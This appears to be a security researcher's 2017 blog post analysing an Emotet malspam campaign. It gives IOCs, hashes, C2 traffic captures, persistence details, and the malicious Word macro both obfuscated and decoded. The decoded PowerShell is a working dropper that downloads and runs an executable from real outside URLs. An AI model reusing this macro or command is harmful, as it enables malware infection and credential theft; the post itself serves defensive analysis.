{"id":917,"date":"2017-07-25T20:08:29","date_gmt":"2017-07-25T19:08:29","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=917"},"modified":"2017-07-25T20:33:34","modified_gmt":"2017-07-25T19:33:34","slug":"2017-07-25-malspam-leading-to-emotet-malware","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=917","title":{"rendered":"2017-07-25 Malspam Leading To Emotet Malware"},"content":{"rendered":"

Today’s post is based on a malicious email that I saw in out email filters. The email (seen below) had a simple link in it that took the user to a site that automatically started a download of a malicious Word document. Odd thing is that when you visited the site in IE8, it would not allow you to connect. The link seemed to work just fine in Chrome or via Malzilla. <\/p>\n

From what I am able to gather based on the network traffic within the PCAP files along with the results from the Virustotal and Hybrid-Analysis links, it looks as if this is a Emotet infection. This infection does not match all the patterns of Emotet that I have seen before. In this example, the only GET request is to get the first malicious binary (I am assuming that there was another GET request which pulled the other file down – more on that in a bit). From there, all recorded communications are done via POSTs using ports 443 or 8080 where in the other examples that I have seen, the GET requests were the ones that would have the cookie set and the fake 404 page being returned. The only common pattern between this and the other Emotet examples I have seen are the callbacks to the malicious IP addresses using port 8080.<\/p>\n

All artifacts, PCAP files, and the Process Monitor log can be found in my Github repo which you can find here<\/a>.<\/p>\n

\"\"<\/a><\/p>\n

IOCs:
\n=====
\npkfans.com \/ 216.14.208.111
\nsiindia.in \/ 103.240.104.231 (TCP:80)
\nwww.todofrog.com \/ 194.132.50.54
\nsegurodecenalsinoct.segurox.es \/ 185.123.204.173
\nrgv2.com \/ 192.185.244.211
\ngracetheweb.co.uk \/ 91.121.84.118
\n178.79.132.214 (TCP:443)
\n158.69.199.223 (TCP:8080)
\n192.241.222.53 (TCP:443)<\/p>\n

Artifacts:
\n==========
\nFile name: GWTQ747195.doc
\nFile size: 96KB
\nMD5 hash: d43707dea7acb647d1394ec60a8a9460
\nVirustotal: http:\/\/virustotal.com\/en\/file\/47332bd975efe20e32dd5640ec2c87f13f60fe752d9c06dbc8eae01ea81c23c2\/analysis\/<\/a>
\nDetection ratio: 4 \/ 57
\nFirst submission: 2017-07-25 06:33:47 UTC
\nMalwr (latest submission): http:\/\/malwr.com\/analysis\/NDlhMDcxOWNmODRiNGEzY2JlZTNiNDkyNDRlOWE5NjE\/<\/a>
\nHybrid-Analysis: http:\/\/www.reverse.it\/sample\/47332bd975efe20e32dd5640ec2c87f13f60fe752d9c06dbc8eae01ea81c23c2?environmentId=100<\/a><\/p>\n

File name: 12721.exe
\nFile size: 160KB
\nFile path: C:\\Users\\%username%\\AppData\\Local\\Temp
\nMD5 hash: dd7a7d9fac4cd59536a050c536e8719a
\nVirustotal: http:\/\/virustotal.com\/en\/file\/b3c292e9504aa6934dfdbaa2a180df2eca1af46a92a2a2b907250d965c3c3f36\/analysis\/<\/a>
\nDetection ratio: 15 \/ 64
\nFirst submission: 2017-07-25 09:37:04 UTC
\nMalwr: NA
\nHybrid-Analysis: http:\/\/www.reverse.it\/sample\/b3c292e9504aa6934dfdbaa2a180df2eca1af46a92a2a2b907250d965c3c3f36?environmentId=100<\/a><\/p>\n

File name: wlanwin.exe
\nFile size: 160KB
\nFile path: C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Windows\\
\nMD5 hash: dd7a7d9fac4cd59536a050c536e8719a
\nVirustotal: http:\/\/virustotal.com\/en\/file\/b3c292e9504aa6934dfdbaa2a180df2eca1af46a92a2a2b907250d965c3c3f36\/analysis\/<\/a>
\nDetection ratio: 15 \/ 64
\nFirst submission: 2017-07-25 09:37:04 UTC
\nMalwr: NA
\nHybrid-Analysis: http:\/\/www.reverse.it\/sample\/b3c292e9504aa6934dfdbaa2a180df2eca1af46a92a2a2b907250d965c3c3f36?environmentId=100<\/a><\/p>\n

File name: KB21091875.exe
\nFile size: 191KB
\nFile path: C:\\Users\\%username%\\AppData\\Local\\Temp
\nMD5 hash: fcfab755b242536de1bbda1d8e0f560a
\nVirustotal: http:\/\/virustotal.com\/en\/file\/f9b044b65b9a2f9fff2920cdf78ad73bbbdc215d81dac65968f5f284b09bbf1b\/analysis\/<\/a>
\nDetection ratio: 14 \/ 63
\nFirst submission: 2017-07-25 12:36:56 UTC
\nMalwr: NA
\nHybrid Analysis: http:\/\/www.reverse.it\/sample\/f9b044b65b9a2f9fff2920cdf78ad73bbbdc215d81dac65968f5f284b09bbf1b?environmentId=100<\/a><\/p>\n

Analysis:
\n=========
\nThis infection is a pretty standard infection vector for end-users as you can see in the image below. The user clicks on the link in the email and downloads a Word document that has a malicious macro in it. Using OfficeMalScanner, I was able to pull out the pertinent parts from the Word document that OfficeMalScanner deemed malicious.<\/p>\n

\"\"<\/a> <\/p>\n

\"\"<\/a><\/p>\n

Looking at the files that OfficeMalScanner was able to produce, I started with the one called “This Document” since this is the start of a macro within a Word document. Below is the contents of that file:<\/p>\n

\r\nAttribute VB_Name = "ThisDocument"\r\nAttribute VB_Base = "1Normal.ThisDocument"\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = True\r\nAttribute VB_Customizable = True\r\n\r\nSub Document_Open()\r\n\tPRekl = "cG93ZXJzaGVsbCAt"\r\n\tJcsmLFtP = "V2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFdT"\r\n\tsnWqf0 = "Y3JpcHQuU2hlbGw7JHdlYmNsaWVudCA9I"\r\n\tp6Fjxva = PRekl & JcsmLFtP & snWqf0\r\n\tJzo4Ht3V = "jaCgkdXJsIGluICR1cmxzKXt0cnl7JHdlYmNsaWVudC5Eb3dubG9hZEZpbGUoJHVybC5Ub1N"\r\n\tgsoVWb = "0cmluZygpLCAkcGF0aCk7U"\r\n\tG5AtFf3LO = Jzo4Ht3V & gsoVWb\r\n\taj04c = "G5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JH"\r\n\tSY1KOT = "JhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9tOyR1"\r\n\tmy2FUgcR = "cmxzID0g"\r\n\tCMzLkgQ = "J2h0dHA6Ly9zaWluZGlh"\r\n\tHBzLujm = aj04c & SY1KOT & my2FUgcR & CMzLkgQ\r\n\tv06idMrR = "LmluL29hZ2NtZ2dwYS8saHR0cDovL3d3dy50b2RvZnJvZy5jb20vcHpway8saHR0cDovL3Nl"\r\n\tcVInx = "Z3Vyb2RlY2VuYWxzaW5vY3Quc2VndXJveC5lcy9nbi8saHR0cDovL"\r\n\tZVfcRrWvg = v06idMrR & cVInx\r\n\txZnKJq9h = "3Jnd"\r\n\trcO8LUIa = "jIuY29tL3dqYmxud3kvLGh0dHA6Ly9ncmFjZXRoZXdlYi5jby51ay9jZHliaC8nLlNwbGl0KCcsJyk7"\r\n\tUi3Zz = xZnKJq9h & rcO8LUIa\r\n\tIFihGa = "JG5hbWUgPSAkcmFuZG9tLm5leHQoMSwgNjU1MzYpOyRwYXRo"\r\n\tZpqxNk = "ID0gJGVudjp0ZW1wICsgJ1wnICsgJG5hbWUgKyAnLmV4ZSc7Zm9yZWF"\r\n\tQ3KrneVxB = IFihGa & ZpqxNk\r\n\tiEJxgcqn = "Q="\r\n\tdKopwt6Nm = Chr(61)\r\n\tKW6P7X = iEJxgcqn & dKopwt6Nm\r\n\tbtk0pUY = "3RhcnQtUHJvY2VzcyAkcGF0aDticmVhazt9Y2F0Y2h7d3JpdGUtaG9zdCAkXy5FeGNlcHRpb24uTWVzc2FnZT"\r\n\tGqEx5ut = "t9f"\r\n\tAuO5hG = btk0pUY & GqEx5ut\r\n\tUT1HW = p6Fjxva & HBzLujm & ZVfcRrWvg & Ui3Zz & Q3KrneVxB & G5AtFf3LO & AuO5hG & KW6P7X\r\n\tCall runm(UT1HW)\r\nEnd Sub<\/pre>\n
Below is the cleaned up version:<\/p>\n
\r\nSub Document_Open()\r\n\tPRekl = "cG93ZXJzaGVsbCAt"\r\n\tJcsmLFtP = "V2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFdT"\r\n\tsnWqf0 = "Y3JpcHQuU2hlbGw7JHdlYmNsaWVudCA9I"\r\n\tp6Fjxva = cG93ZXJzaGVsbCAtV2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFdTY3JpcHQuU2hlbGw7JHdlYmNsaWVudCA9I\r\n\r\n\tJzo4Ht3V = "jaCgkdXJsIGluICR1cmxzKXt0cnl7JHdlYmNsaWVudC5Eb3dubG9hZEZpbGUoJHVybC5Ub1N"\r\n\tgsoVWb = "0cmluZygpLCAkcGF0aCk7U"\r\n\tG5AtFf3LO = jaCgkdXJsIGluICR1cmxzKXt0cnl7JHdlYmNsaWVudC5Eb3dubG9hZEZpbGUoJHVybC5Ub1N0cmluZygpLCAkcGF0aCk7U\r\n\r\n\taj04c = "G5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JH"\r\n\tSY1KOT = "JhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9tOyR1"\r\n\tmy2FUgcR = "cmxzID0g"\r\n\tCMzLkgQ = "J2h0dHA6Ly9zaWluZGlh"\r\n\tHBzLujm = G5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9tOyR1cmxzID0gJ2h0dHA6Ly9zaWluZGlh\r\n\r\n\tv06idMrR = "LmluL29hZ2NtZ2dwYS8saHR0cDovL3d3dy50b2RvZnJvZy5jb20vcHpway8saHR0cDovL3Nl"\r\n\tcVInx = "Z3Vyb2RlY2VuYWxzaW5vY3Quc2VndXJveC5lcy9nbi8saHR0cDovL"\r\n\tZVfcRrWvg = LmluL29hZ2NtZ2dwYS8saHR0cDovL3d3dy50b2RvZnJvZy5jb20vcHpway8saHR0cDovL3NlZ3Vyb2RlY2VuYWxzaW5vY3Quc2VndXJveC5lcy9nbi8saHR0cDovL\r\n\r\n\txZnKJq9h = "3Jnd"\r\n\trcO8LUIa = "jIuY29tL3dqYmxud3kvLGh0dHA6Ly9ncmFjZXRoZXdlYi5jby51ay9jZHliaC8nLlNwbGl0KCcsJyk7"\r\n\tUi3Zz = 3JndjIuY29tL3dqYmxud3kvLGh0dHA6Ly9ncmFjZXRoZXdlYi5jby51ay9jZHliaC8nLlNwbGl0KCcsJyk7\r\n\r\n\tIFihGa = "JG5hbWUgPSAkcmFuZG9tLm5leHQoMSwgNjU1MzYpOyRwYXRo"\r\n\tZpqxNk = "ID0gJGVudjp0ZW1wICsgJ1wnICsgJG5hbWUgKyAnLmV4ZSc7Zm9yZWF"\r\n\tQ3KrneVxB = JG5hbWUgPSAkcmFuZG9tLm5leHQoMSwgNjU1MzYpOyRwYXRoID0gJGVudjp0ZW1wICsgJ1wnICsgJG5hbWUgKyAnLmV4ZSc7Zm9yZWF\r\n\r\n\tiEJxgcqn = "Q="\r\n\tdKopwt6Nm = Chr(61)\r\n\tKW6P7X = Q==\r\n\r\n\tbtk0pUY = "3RhcnQtUHJvY2VzcyAkcGF0aDticmVhazt9Y2F0Y2h7d3JpdGUtaG9zdCAkXy5FeGNlcHRpb24uTWVzc2FnZT"\r\n\tGqEx5ut = "t9f"\r\n\tAuO5hG = 3RhcnQtUHJvY2VzcyAkcGF0aDticmVhazt9Y2F0Y2h7d3JpdGUtaG9zdCAkXy5FeGNlcHRpb24uTWVzc2FnZTt9f\r\n\r\n\tUT1HW = cG93ZXJzaGVsbCAtV2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFdTY3JpcHQuU2hlbGw7JHdlYmNsaWVudCA9IG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9tOyR1cmxzID0gJ2h0dHA6Ly9zaWluZGlhLmluL29hZ2NtZ2dwYS8saHR0cDovL3d3dy50b2RvZnJvZy5jb20vcHpway8saHR0cDovL3NlZ3Vyb2RlY2VuYWxzaW5vY3Quc2VndXJveC5lcy9nbi8saHR0cDovL3JndjIuY29tL3dqYmxud3kvLGh0dHA6Ly9ncmFjZXRoZXdlYi5jby51ay9jZHliaC8nLlNwbGl0KCcsJyk7JG5hbWUgPSAkcmFuZG9tLm5leHQoMSwgNjU1MzYpOyRwYXRoID0gJGVudjp0ZW1wICsgJ1wnICsgJG5hbWUgKyAnLmV4ZSc7Zm9yZWFjaCgkdXJsIGluICR1cmxzKXt0cnl7JHdlYmNsaWVudC5Eb3dubG9hZEZpbGUoJHVybC5Ub1N0cmluZygpLCAkcGF0aCk7U3RhcnQtUHJvY2VzcyAkcGF0aDticmVhazt9Y2F0Y2h7d3JpdGUtaG9zdCAkXy5FeGNlcHRpb24uTWVzc2FnZTt9fQ==\r\n\r\n\tCall runm(UT1HW)\r\nEnd Sub<\/pre>\n
As seen from the cleaned up code above, everything is base64 encoded. There is a call for the function “runm” which passes the parameter of “UT1HW” which is also the last variable in the sub-routine. All the other files are junk at this point and can be ignored\/excluded.<\/p>\n
Knowing that the code is all in this one file, and that it is all base64 encoded, all that is needed is to run this through a base64 decoder. The following is the base64 code decoded:<\/p>\n
\r\npowershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http:\/\/siindia.in\/oagcmggpa\/,http:\/\/www.todofrog.com\/pzpk\/,http:\/\/segurodecenalsinoct.segurox.es\/gn\/,http:\/\/rgv2.com\/wjblnwy\/,http:\/\/gracetheweb.co.uk\/cdybh\/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}<\/pre>\n
So now we know that this malicious Word document is using Powershell to reach out to the above mentioned URLs to work as a dropper. Knowing this, I decided to run the Word document to see what would happen. From the network side of things, this looks to be pretty straight forward as seen below:<\/p>\n
\"\"<\/a><\/p>\n
The script reaches out to the domain “siindia[.]in” to grab a malicious binary:<\/p>\n
\r\nGET \/oagcmggpa\/ HTTP\/1.1\r\nHost: siindia.in\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Tue, 25 Jul 2017 10:25:06 GMT\r\nServer: Apache\/2.2.15 (CentOS)\r\nX-Powered-By: PHP\/5.3.3\r\nCache-Control: no-cache, no-store, max-age=0, must-revalidate\r\nPragma: no-cache\r\nContent-Disposition: attachment; filename="w.exe"\r\nContent-Transfer-Encoding: binary\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: application\/octet-stream\r\n\r\n2000\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.\r\n\r\n$..........w..i$..i$..i$...$..i$...$..i$..h$..i$.W.$..i$...$..i$...$..i$...$..i$Rich..i$................PE..L.....vY..............<\/pre>\n
Then there is some communication back to the IP address of 178.79.132.214 over port 443 via two POST commands. This is NOT encrypted traffic even though it is over port 443 and made to look like it goes to a dead page (returns a 404 HTTP code even though there is 437524 bytes returned for example). Note that while this is not encrypted HTTPS traffic, the communication is encrypted\/encoded.<\/p>\n
\r\nFrom STREAM 1\r\n-------------\r\nPOST \/ HTTP\/1.1\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)\r\nHost: 178.79.132.214:443\r\nContent-Length: 436\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n..Z.)._.!)..f,.$+.....@...j.........rZ.T-.j....Jw....:.K....J.....hv&$.R...S1.2.T...Hb...Y@.`.QC)...\r\n.i(..\r\n....N.[w.Ey.\r\n..IIs.@.7l+<..0.c..\t..,....MX.#.)O.......'...rZ.93f.......\r\n.<........B"=.. @~.\/..>.y..Q..Wd...4u.+.......t:fRZ4....80...z!*....^0...<u(.M.v..T....DN.$...h..o..3Q..[=\r\nB.Pr...~.L.v..]I..Ea..\\...........Z?.#.u........A#....\\y..O...`BT...J.@NIN.l...aS..w.b....[S..O0}QY..l..l...k`...t.n..8(7......\0\th...B..l>.K....*s.cO\r\n\r\nHTTP\/1.1 404 Not Found\r\nServer: nginx\r\nDate: Tue, 25 Jul 2017 10:25:19 GMT\r\nContent-Type: text\/html; charset=UTF-8\r\nContent-Length: 437524\r\nConnection: keep-alive\r\n\r\n.D.....m.>...Q.....<.\/+.!..8.....47..U.QM.....tDv0.9k..U.0..C..>....a.E....!.U...J....G.._CW?.0.....3.....[H{.g...H........TR.xx........q%.D......O.`\t....R.I....^..J1..Z%.....P.4EI...yI.e.(..z>..8G...H.~.O.J..9|...Lj.o...)1..\r\n...&:...>.J.....a...n........yB....m......F........>.\t..-........X..!s....u....\r\n..z..F...En.^...NX..7...'.%.......\\..2.....<K:E..[.~......pc\r\n\r\n-----\r\n\r\nPOST \/ HTTP\/1.1\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)\r\nHost: 178.79.132.214:443\r\nContent-Length: 452\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n.U.......2....).f....6t......[.....E.^......S."..U.m.vr.so(...i.....P............O..dU.:..]..Y:..e;.n..b...o.@...:..Y.`2.D.5.T........v.K..7,...+......Q...w._.t.-.....f....b....L....O..G.J..0.....w.Cf..y.\t.......g.ma.D...o..D.<.....,.....\\H....TE6B..d.....e*..7...(...~1..........N.%a|.pkK.d....L,....<...O..;w\\....xC.\/............N....i...g#..+....W.2W.........LY.H.....a... ..0=k.H.c.X....#"\r\n..q....7!.CB....>...M.P..Q..W.4.....R.....<.F...U......@..\r\n\r\nHTTP\/1.1 404 Not Found\r\nServer: nginx\r\nDate: Tue, 25 Jul 2017 10:25:22 GMT\r\nContent-Type: text\/html; charset=UTF-8\r\nContent-Length: 148\r\nConnection: keep-alive\r\n\r\n.U..!....M.=.....Vy..a..j..*.V3..$......,..|..mE..J....{..9.-....`3^.L...,..T..,W.....1.........P!c.J.i...w.......\/..] ......K..x~..dg.\t&LHk..N;tS7b\r\n\r\n-----\r\n\r\nFrom STREAM 2\r\n-------------\r\nPOST \/ HTTP\/1.1\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)\r\nHost: 192.241.222.53:443\r\nContent-Length: 276\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nu..........^g..v.......Rzb....."oA.P...B.?..MV.Ssp.\t]."...K@e.\\...Y.l\\[A.:T.I@..B.T..v..1].'..E]...`g.6..|\\. ....EO.....&.Zn....c.(..Q.1q.....qj\r\n.J..Iu.o...t $..b....t.n.:.g.b...%y..I.........m_.~4.......&..U0qX?....)MA.Y...-...uN|.e.....Y!....e 8.vi...P..$C.ce...z.0(.c..<.].\r\n\r\nHTTP\/1.1 404 Not Found\r\nServer: nginx\r\nDate: Tue, 25 Jul 2017 10:25:37 GMT\r\nContent-Type: text\/html; charset=UTF-8\r\nContent-Length: 148\r\nConnection: keep-alive\r\n\r\n9..f.\/.%......r...M>.6..3S....x.>%..a.]O..iI.4|............8s..4:......[H;...(....)..Sww.m.py..D[.,j..{<...CX.E;....V......`.O...&..........`....g..<\/pre>\n
From the host side, this seems to be pretty straight-forward as well. Once the malicious macro has run, it used Powershell (as seen above) and pulled down the file 12721.exe (randomly generated name saved to C:\\Users\\%username%\\AppData\\Local\\Temp) which proceeded to open and close several instances of itself before opening a new process called “wlanwin.exe” in a new directory (C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Windows\\). This new file then proceeds to clone itself and start a new process while killing off the old processes (very much like the 12721.exe process did). The last “wlanwin.exe” can be seen in a “CLOSE_WAIT” status connected to the IP address of 178.79.132.214. I also saw that “wlanwin.exe” wrote to three files called “FF36.tmp,” “FF37.tmp,” and “FF57.tmp” in the “C:\\ProgramData” folder but I was not able to capture those files since the “wlanwin.exe” process deleted the files. <\/p>\n
\"\"<\/a><\/p>\n
When looking at the two files (12721.exe and wlanwin.exe) themselves, they are the same size and also have the same hash so most likely the code behind 12721.exe instructs a clone of itself to be made to a new directory with a new name. <\/p>\n
\"\"<\/a><\/p>\n
I also noticed within the Process Monitor logs that wlanwin.exe (PID: 3028) scanned the system looking for various things (ie: C:\\Users\\%username%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data) looking for what I can only assume are credentials stored in Chrome while wlanwin.exe (PID: 2192) was looking for other bits from Outlook and some other pieces of software like Thunderbird, and Microsoft Mail. I also noticed a pattern when looking at all the different “wlanwin.exe” processes. It looked like whenever one of the “wlanwin.exe” processes was looking at different registry keys\/file locations for user credentials and such, it would write to the FF*.tmp file and then close that file as you can see below:<\/p>\n
\"\"<\/a><\/p>\n
\"\"<\/a><\/p>\n
Persistence is obtained on the system by “wlanwin.exe” writing to the “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” key.<\/p>\n
\r\nName: wlanwin.exe\r\nPID: 2368\r\nDate: 7\/25\/2017 11:25:23 AM\r\nPath: "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\wlanwin"\r\nOperation: RegSetValue\r\nResult: Success\r\nType:\tREG_SZ\r\nLength:\t120\r\nData:\t"C:\\Users\\Bill\\AppData\\Local\\Microsoft\\Windows\\wlanwin.exe"<\/pre>\n
After a while of just letting the VM sit there and continue to communicate out, I came back to it to discover that another file in the TEMP folder had been created (KB21091875.exe) and that it was talking out to the IP address of 158.69.199.223 over port 8080. Since I had already turned off everything I was not able to see what or how this new file got onto my VM. I opened up Wireshark to see if I could get some more information about this new IP address via port 8080. The PCAP from this run is called “2017-07-25 Emotet-2.pcap” for reference. From what I could see, this looks to be the same as the above POSTs but now to a couple more IP addresses.<\/p>\n
\r\nPOST \/ HTTP\/1.1\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)\r\nHost: 158.69.199.223:8080\r\nContent-Length: 388\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n.-...l8.}\r\nl......\r\nz...s...p...>$.....LNG$d.*.g..24.....P..ku....gZ...?YC.K.r.q...bE0 .....i...a)....bVx..L>..18...]+...P.n;?..E..amp-..m...J.w'|.7f\r\n-....d.\t..r....T.6...{q........8...is..J..z.......z...d....I..?.......#..a.....c\/M`.D...I..^SNs .......=.)...s.........#..T.V...Z"[q{.......T4...;s.&.S.(.U..g..,.....*..1^.Q..Hy.E$.#..N.\r\n.......I.a.<..3..!i7.....&tI..l....;......Z..........\r\n\r\nHTTP\/1.1 404 Not Found\r\nServer: nginx\r\nDate: Tue, 25 Jul 2017 13:27:16 GMT\r\nContent-Type: text\/html; charset=UTF-8\r\nContent-Length: 153796\r\nConnection: keep-alive\r\n\r\nYI...V%..6.-..5!..H.t....W..A(,...J........(X...L...T...Q.1...b..:..pG.@.Z....0@.9F.V..W...C".i..cr5..<\/pre>\n
\"\"<\/a><\/p>\n
I forgot to grab a screen shot of KB21091875.exe running on my VM before rebooting the system to see what would happen after a reboot. Once my VM was back up and running from the reboot, I saw more of the same type of network behavior that I mentioned above and nothing else new.<\/p>\n
\"\"<\/a><\/p>\n
I have also recorded the infection and posted it over on my Youtube channel which you can find here<\/a> and below.<\/p>\n